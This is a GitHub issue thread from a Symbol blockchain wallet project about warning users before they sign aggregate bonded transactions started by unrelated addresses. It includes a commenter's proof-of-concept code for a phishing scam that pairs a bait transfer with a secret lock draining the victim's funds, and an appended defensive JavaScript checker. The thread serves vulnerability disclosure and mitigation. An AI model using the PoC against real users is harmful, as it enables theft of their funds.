Additional warning for aggregate bonded announced by "third party" address #1719

Closed
cryptoBeliever opened this issue Sep 29, 2021 · 4 comments · Fixed by #1723
Labels
P1 Issue Breaking issue effecting large number of users, Security issue, Risk to users funds Sprint 4

Comments


cryptoBeliever commented Sep 29, 2021

Reason:

Scammers are sending aggregate bonded requesting all funds to random addresses (transaction is initialized from a "third-party" wallet). For example:
http://explorer.symbolblockchain.io/transactions/7BE1EB498B914BDA7F17C26789711E62276280F6322A8C3F36A9E60CD878C9B6

We should add a warning (after the pop-up with the password) - double confirmation - to ask the user if he really wants to send this transaction because it was initialized by the third-party wallet.

We should warn if the account which initialized the tx is not related to the account that is signing (we should not warn if another cosigner from the same multi- initialized the transaction).

There are some legit bonded initialized by "third-party" accounts like those sent by All nodes or nember.art, and in the future we should maybe do some "whitelist" of addresses.

@cryptoBeliever cryptoBeliever added the P1 Issue Breaking issue effecting large number of users, Security issue, Risk to users funds label Sep 29, 2021
@cryptoBeliever cryptoBeliever changed the title Additional warning for aggregate bonded announced by "third party" wallet Additional warning for aggregate bonded announced by "third party" address Sep 29, 2021
coiki commented Sep 29, 2021

@coiki coiki added the Sprint 4 label Sep 29, 2021
@segfaultxavi

Suggested text:

You are about to sign a transaction which was not created by you. Please review the details CAREFULLY.

⚠️ Do not sign if you do not know the origin of the transaction ⚠️

Do you want to proceed?

hanatyan128 commented Sep 29, 2021

Related issue here:
An exploit of secret lock exists that can be used by phishing fraud.

POC code

    const aggregateTx = AggregateTransaction.createBonded(
        Deadline.create(epochAdjustment),
        [
            // Tx 1 - Steal the money
            SecretLockTransaction.create(
                Deadline.create(epochAdjustment),
                new Mosaic(networkCurrencyMosaicId, UInt64.fromNumericString('10000000000')),
                UInt64.fromUint(24 * 3600 / 60),
                LockHashAlgorithm.Op_Sha3_256,
                secret,
                attacker.address,
                networkType,
            ).toAggregate(victim),
            // Tx 2 - Bait
            TransferTransaction.create(
                Deadline.create(epochAdjustment),
                victim.address,
                [
                    new Mosaic(
                        networkCurrencyMosaicId,
                        UInt64.fromNumericString('500000000')
                    )
                ],
                PlainMessage.create('Congratulations! You got award!'),
                networkType,
            ).toAggregate(attacker.publicAccount)
        ],
        networkType,
        [],
        UInt64.fromNumericString('1000000'));

The victim will get a partial transaction below

[Image: exploit_secret_lock]

http://explorer.testnet.symboldev.network/transactions/98A58EAC33362021CDBAB5D61699BA3918127287037DA5629E8FD2815E7DAF12

Once the victim has signed the partial transaction, the attacker announces the proof and grabs the victim's assets.

@cryptoBeliever

@hanatyan128 showing secret lock will be done in a separate issue.
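
The warning rule from the opening comment (warn when the initiating account is unrelated to the signer, but not for a cosigner of the same multisig or an allowlisted service), combined with the outgoing-funds listing that the secret lock comment motivates, as an added example that is not the wallet's own code. Plain objects stand in for SDK models; the field names, the `reviewPartial` helper and the `ADDR-...` values are assumptions constructed for illustration.

```javascript
// Added example; plain objects stand in for wallet/SDK models (all names hypothetical).

// Inner transaction types that move mosaics out of their signer's account.
const DEBITING_TYPES = new Set(['TRANSFER', 'SECRET_LOCK']);

// partial: { initiator, innerTransactions: [{ type, signer, recipient, amount }] }
// ctx: { signer, relatedAddresses, allowlist }, where relatedAddresses holds the
// user's own accounts plus cosigners of multisig accounts the user belongs to.
function reviewPartial(partial, ctx) {
  const related = new Set([ctx.signer, ...ctx.relatedAddresses]);
  const thirdParty = !related.has(partial.initiator);
  const allowlisted = ctx.allowlist.has(partial.initiator);

  // Everything the aggregate would take from the cosigning account, including
  // secret locks, which release funds to the recipient once the proof is announced.
  const outgoing = partial.innerTransactions
    .filter((tx) => tx.signer === ctx.signer && DEBITING_TYPES.has(tx.type))
    .map((tx) => ({ type: tx.type, recipient: tx.recipient, amount: BigInt(tx.amount) }));
  const totalOut = outgoing.reduce((sum, tx) => sum + tx.amount, 0n);

  // Second confirmation only for unrelated, non-allowlisted initiators;
  // `outgoing` is returned either way so the dialog can list what leaves the account.
  return { warn: thirdParty && !allowlisted, thirdParty, outgoing, totalOut };
}

// Constructed sample shaped like the partial transaction in the comment above.
const samplePartial = {
  initiator: 'ADDR-UNKNOWN',
  innerTransactions: [
    { type: 'SECRET_LOCK', signer: 'ADDR-USER', recipient: 'ADDR-UNKNOWN', amount: '10000000000' },
    { type: 'TRANSFER', signer: 'ADDR-UNKNOWN', recipient: 'ADDR-USER', amount: '500000000' },
  ],
};
const sampleCtx = {
  signer: 'ADDR-USER',
  relatedAddresses: new Set(['ADDR-COSIGNER']),
  allowlist: new Set(['ADDR-SERVICE']),
};

const review = reviewPartial(samplePartial, sampleCtx);
console.log(review.warn, review.totalOut.toString());
```

Listing `outgoing` next to the warning text puts the secret lock in front of the user instead of only the incoming transfer.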
